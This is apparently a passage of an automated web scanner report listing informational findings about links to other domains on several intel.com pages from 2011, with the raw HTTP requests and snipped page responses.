P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:42 GMT
Content-Length: 25974
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.49. http://www.intel.com/ar_AE/consumer/products/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /ar_AE/consumer/products/processors/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/ar_AE/consumer/products/processors/index.htm?iid=gg_ar_XR+noscript
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr-AE+invrel

Request

GET /ar_AE/consumer/products/processors/index.htm?iid=gg_ar_XR+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36851


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-AE" lang="ar-AE">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-AE+invrel">............ ....................</a>
...[SNIP]...

17.50. http://www.intel.com/ar_EG/consumer/products/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /ar_EG/consumer/products/processors/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/ar_EG/consumer/products/processors/index.htm?iid=gg_ar_EG+noscript
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr-EG+invrel

Request

GET /ar_EG/consumer/products/processors/index.htm?iid=gg_ar_EG+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37034


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-EG" lang="ar-EG">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-EG+invrel">............ ....................</a>
...[SNIP]...

17.51. http://www.intel.com/ar_SA/consumer/products/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /ar_SA/consumer/products/processors/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/ar_SA/consumer/products/processors/index.htm?iid=gg_ar_SA+noscript
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr-SA+invrel

Request

GET /ar_SA/consumer/products/processors/index.htm?iid=gg_ar_SA+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37052


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-SA" lang="ar-SA">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-SA+invrel">............ ....................</a>
...[SNIP]...

17.52. http://www.intel.com/business/enterprise/emea/zaf/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/zaf/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/business/enterprise/emea/zaf/index.htm?iid=gg_en_ZA+noscript
The response contains the following links to other domains:
  • http://mediaproducts.gartner.com/reprints/intel/153886.html
  • http://www.intc.com/index.cfm?iid=ftr-UK+invrel
  • http://www.intelfasterfs.com/
  • http://www.itweb.co.za/sections/computing/2009/0905180907.asp?S=Business%20Applications&A=BAP&O=google

Request

GET /business/enterprise/emea/zaf/index.htm?iid=gg_en_ZA+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-za">
<head>
<title>Intel&reg; Products and Resources for Business</title>
...[SNIP]...
<div class="tabBoxGradPad">
                   <a href="http://www.intelfasterfs.com" onClick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=ENGTBD');" target="_blank">Intel fasterFS</a>
...[SNIP]...
<p>
                   <a href="http://www.itweb.co.za/sections/computing/2009/0905180907.asp?S=Business%20Applications&A=BAP&O=google#11" target="_blank">Intel intros business apps</a>
...[SNIP]...
<p>
                   <a href="http://mediaproducts.gartner.com/reprints/intel/153886.html" onClick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=ENGTBD');" target="_blank">Gartner validates corporate purchase of Intel.. vPro... technology</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-UK+invrel">Investor Relations</a>
...[SNIP]...

17.53. http://www.intel.com/business/vpro/alliance/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/vpro/alliance/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/business/vpro/alliance/index.htm?iid=subhdr+itc_vproalliance
The response contains the following links to other domains:
  • http://en.services.binarygate.biz/solutions/intel-vpro
  • http://www.advancedmarketplace.com/
  • http://www.be-intuitive.com/
  • http://www.compucom.com/
  • http://www.enpointeglobal.com/intel
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.lenovo.com/
  • http://www.pdspc.com/ROInow
  • http://www.syssrc.com/
  • http://www.uk.atosorigin.com/en-uk/services/solutions/managed_operations/technical_consulting/
  • http://www.valerent.com/
  • http://yui.yahooapis.com/2.8.0r4/build/carousel/assets/skins/sam/carousel.css
  • http://yui.yahooapis.com/combo?2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js&2.8.0r4/build/element/element-min.js&2.8.0r4/build/animation/animation-min.js&2.8.0r4/build/carousel/carousel-min.js&2.8.0r4/build/selector/selector-min.js

Request

GET /business/vpro/alliance/index.htm?iid=subhdr+itc_vproalliance HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel vPro Technology Alliance</title>

   <link rel="
...[SNIP]...
<!-- Combo-handled YUI JS files: Carousel -->
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js&2.8.0r4/build/element/element-min.js&2.8.0r4/build/animation/animation-min.js&2.8.0r4/build/carousel/carousel-min.js&2.8.0r4/build/selector/selector-min.js"></script>
<!-- Core carousel CSS -->
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/2.8.0r4/build/carousel/assets/skins/sam/carousel.css">
<link rel="stylesheet" type="text/css" href="/business/vpro/alliance/css/vpro_alliance.css">
...[SNIP]...
</h4>
                       <a href="http://www.advancedmarketplace.com/"target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.uk.atosorigin.com/en-uk/services/solutions/managed_operations/technical_consulting/" target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://en.services.binarygate.biz/solutions/intel-vpro" target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.compucom.com" target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.enpointeglobal.com/intel"target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.be-intuitive.com" target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.lenovo.com"target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.pdspc.com/ROInow" target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.SysSrc.com" target="_blank"><strong>
...[SNIP]...
</h4>
                       <a href="http://www.valerent.com"target="_blank"><strong>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.54. http://www.intel.com/buy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /buy/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/buy/?iid=gg_prod-en_US+bus_shop
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /buy/?iid=gg_prod-en_US+bus_shop HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:14 GMT
Content-Length: 26099
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Buy Intel&reg; Products and Services . Intel Corporati
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.55. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/distributor/asmo-na/eng/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti
The response contains the following links to other domains:
  • http://sales.liveperson.net/hc/56727252/?cmd=file&file=visitorWantsToChat&site=56727252&byhref=1&SESSIONVAR!skill=NAResellerPrograms-English&imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/livechat/eng/
  • http://sales.liveperson.net/hc/56727252/?cmd=repstate&site=56727252&channel=web&&ver=1&imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/livechat/eng/&skill=NAResellerPrograms-English
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:36 GMT
Date: Sat, 05 Feb 2011 23:18:36 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35633

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
<div align="center" xmlns:vam="Intel.Ebusiness.CB06" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:soa="http://tempuri.org/"><a href="http://sales.liveperson.net/hc/56727252/?cmd=file&amp;file=visitorWantsToChat&amp;site=56727252&amp;byhref=1&amp;SESSIONVAR!skill=NAResellerPrograms-English&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/livechat/eng/" target="chat56727252" xmlns:cd="urn:cd-scripts"><img border="0" src="http://sales.liveperson.net/hc/56727252/?cmd=repstate&amp;site=56727252&amp;channel=web&amp;&amp;ver=1&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/distributor/images/livechat/eng/&amp;skill=NAResellerPrograms-English"></a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.56. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
